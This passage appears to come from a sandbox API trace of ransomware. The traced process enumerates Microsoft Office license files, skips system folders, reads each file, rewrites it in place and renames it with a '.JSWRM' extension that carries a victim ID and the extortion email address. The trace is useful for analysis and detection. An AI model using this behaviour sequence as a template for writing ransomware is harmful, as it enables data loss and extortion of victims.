(lpString1="AccessR_Retail-pl.xrm-ms", lpString2="...") returned 1 [0102.514] lstrcmpiW (lpString1="AccessR_Retail-pl.xrm-ms", lpString2="windows") returned -1 [0102.514] lstrcmpiW (lpString1="AccessR_Retail-pl.xrm-ms", lpString2="recovery") returned -1 [0102.514] lstrcmpiW (lpString1="AccessR_Retail-pl.xrm-ms", lpString2="perflogs") returned -1 [0102.514] lstrcmpiW (lpString1="AccessR_Retail-pl.xrm-ms", lpString2="documents and settings") returned -1 [0102.514] lstrcmpiW (lpString1="AccessR_Retail-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0102.514] lstrcmpiW (lpString1="AccessR_Retail-pl.xrm-ms", lpString2="system volume information") returned -1 [0102.514] lstrcmpiW (lpString1="AccessR_Retail-pl.xrm-ms", lpString2="msocache") returned -1 [0102.514] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0102.514] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AccessR_Retail-pl.xrm-ms", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0102.514] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0102.514] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AccessR_Retail-pl.xrm-ms", cchWideChar=24, lpMultiByteStr=0x2412e0, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AccessR_Retail-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 24 [0102.514] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0102.514] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0102.514] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AccessR_Retail-pl.xrm-ms", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0102.514] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0102.514] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AccessR_Retail-pl.xrm-ms", cchWideChar=24, lpMultiByteStr=0x241290, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AccessR_Retail-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 24 [0102.514] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0102.514] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0102.514] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0102.514] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0102.514] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0102.514] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0102.514] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\AccessR_Retail-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\accessr_retail-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0102.515] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=10631) returned 1 [0102.515] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.515] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2980) returned 0x24c1d0 [0102.515] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2980, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2980, lpOverlapped=0x0) returned 1 [0102.522] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.523] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2980, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2980, lpOverlapped=0x0) returned 1 [0102.523] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0102.523] CloseHandle (hObject=0x45c) returned 1 [0102.523] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0102.523] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0102.523] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0102.523] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0102.523] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0102.523] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0102.523] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0102.523] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0102.523] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0102.523] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0102.523] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0102.523] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0102.523] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0102.523] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0102.523] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\AccessR_Retail-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\accessr_retail-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\AccessR_Retail-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\accessr_retail-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0102.524] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0102.524] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0102.524] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0102.524] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0102.524] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0102.524] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe29cf0c3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe29cf0c3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe2d16476, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x512a, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="AccessR_Retail-ppd.xrm-ms", cAlternateFileName="AC6686~1.XRM")) returned 1 [0102.524] lstrcmpiW (lpString1="AccessR_Retail-ppd.xrm-ms", lpString2=".") returned 1 [0102.524] lstrcmpiW (lpString1="AccessR_Retail-ppd.xrm-ms", lpString2="..") returned 1 [0102.524] lstrcmpiW (lpString1="AccessR_Retail-ppd.xrm-ms", lpString2="...") returned 1 [0102.524] lstrcmpiW (lpString1="AccessR_Retail-ppd.xrm-ms", lpString2="windows") returned -1 [0102.524] lstrcmpiW (lpString1="AccessR_Retail-ppd.xrm-ms", lpString2="recovery") returned -1 [0102.524] lstrcmpiW (lpString1="AccessR_Retail-ppd.xrm-ms", lpString2="perflogs") returned -1 [0102.524] lstrcmpiW (lpString1="AccessR_Retail-ppd.xrm-ms", lpString2="documents and settings") returned -1 [0102.524] lstrcmpiW (lpString1="AccessR_Retail-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0102.524] lstrcmpiW (lpString1="AccessR_Retail-ppd.xrm-ms", lpString2="system volume information") returned -1 [0102.524] lstrcmpiW (lpString1="AccessR_Retail-ppd.xrm-ms", lpString2="msocache") returned -1 [0102.524] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0102.525] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AccessR_Retail-ppd.xrm-ms", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0102.525] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0102.525] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AccessR_Retail-ppd.xrm-ms", cchWideChar=25, lpMultiByteStr=0x2411c8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AccessR_Retail-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 25 [0102.525] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0102.525] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0102.525] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AccessR_Retail-ppd.xrm-ms", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0102.525] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0102.525] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AccessR_Retail-ppd.xrm-ms", cchWideChar=25, lpMultiByteStr=0x2410d8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AccessR_Retail-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 25 [0102.525] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0102.525] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0102.525] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0102.525] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0102.525] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0102.525] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0102.525] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\AccessR_Retail-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\accessr_retail-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0102.525] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=20778) returned 1 [0102.525] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.525] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5120) returned 0x24c1d0 [0102.526] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5120, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5120, lpOverlapped=0x0) returned 1 [0102.528] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.528] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5120, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5120, lpOverlapped=0x0) returned 1 [0102.529] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0102.529] CloseHandle (hObject=0x45c) returned 1 [0102.529] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0102.529] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0102.529] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0102.529] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0102.529] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0102.529] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0102.529] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0102.529] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0102.529] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0102.529] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0102.529] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0102.529] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e8b8 [0102.529] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0102.529] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0102.529] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\AccessR_Retail-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\accessr_retail-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\AccessR_Retail-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\accessr_retail-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0102.530] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e8b8 | out: hHeap=0x1e0000) returned 1 [0102.530] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0102.530] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0102.530] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0102.530] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0102.530] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe29366eb, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe29366eb, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe29cf0c3, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d3b, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="AccessR_Retail-ul-oob.xrm-ms", cAlternateFileName="ACCESS~4.XRM")) returned 1 [0102.530] lstrcmpiW (lpString1="AccessR_Retail-ul-oob.xrm-ms", lpString2=".") returned 1 [0102.530] lstrcmpiW (lpString1="AccessR_Retail-ul-oob.xrm-ms", lpString2="..") returned 1 [0102.530] lstrcmpiW (lpString1="AccessR_Retail-ul-oob.xrm-ms", lpString2="...") returned 1 [0102.530] lstrcmpiW (lpString1="AccessR_Retail-ul-oob.xrm-ms", lpString2="windows") returned -1 [0102.530] lstrcmpiW (lpString1="AccessR_Retail-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0102.530] lstrcmpiW (lpString1="AccessR_Retail-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0102.530] lstrcmpiW (lpString1="AccessR_Retail-ul-oob.xrm-ms", lpString2="documents and settings") returned -1 [0102.530] lstrcmpiW (lpString1="AccessR_Retail-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0102.530] lstrcmpiW (lpString1="AccessR_Retail-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0102.530] lstrcmpiW (lpString1="AccessR_Retail-ul-oob.xrm-ms", lpString2="msocache") returned -1 [0102.530] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0102.530] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AccessR_Retail-ul-oob.xrm-ms", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0102.530] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0102.530] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AccessR_Retail-ul-oob.xrm-ms", cchWideChar=28, lpMultiByteStr=0x2410d8, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AccessR_Retail-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 28 [0102.530] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0102.530] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0102.530] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AccessR_Retail-ul-oob.xrm-ms", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0102.530] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0102.531] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AccessR_Retail-ul-oob.xrm-ms", cchWideChar=28, lpMultiByteStr=0x241308, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AccessR_Retail-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 28 [0102.531] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0102.531] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0102.531] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0102.531] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0102.531] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0102.531] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0102.531] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\AccessR_Retail-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\accessr_retail-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0102.531] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11579) returned 1 [0102.531] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.531] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d30) returned 0x24c1d0 [0102.531] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d30, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d30, lpOverlapped=0x0) returned 1 [0102.534] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.534] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d30, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d30, lpOverlapped=0x0) returned 1 [0102.534] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0102.534] CloseHandle (hObject=0x45c) returned 1 [0102.534] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0102.534] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0102.534] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0102.534] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0102.534] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0102.534] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0102.534] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0102.534] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0102.534] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0102.534] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0102.534] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0102.534] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e8b8 [0102.534] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0102.534] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0102.534] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\AccessR_Retail-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\accessr_retail-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\AccessR_Retail-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\accessr_retail-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0102.535] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e8b8 | out: hHeap=0x1e0000) returned 1 [0102.535] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0102.535] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0102.535] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0102.535] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0102.535] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe2b4c7d1, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe2b4c7d1, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe2dd500f, 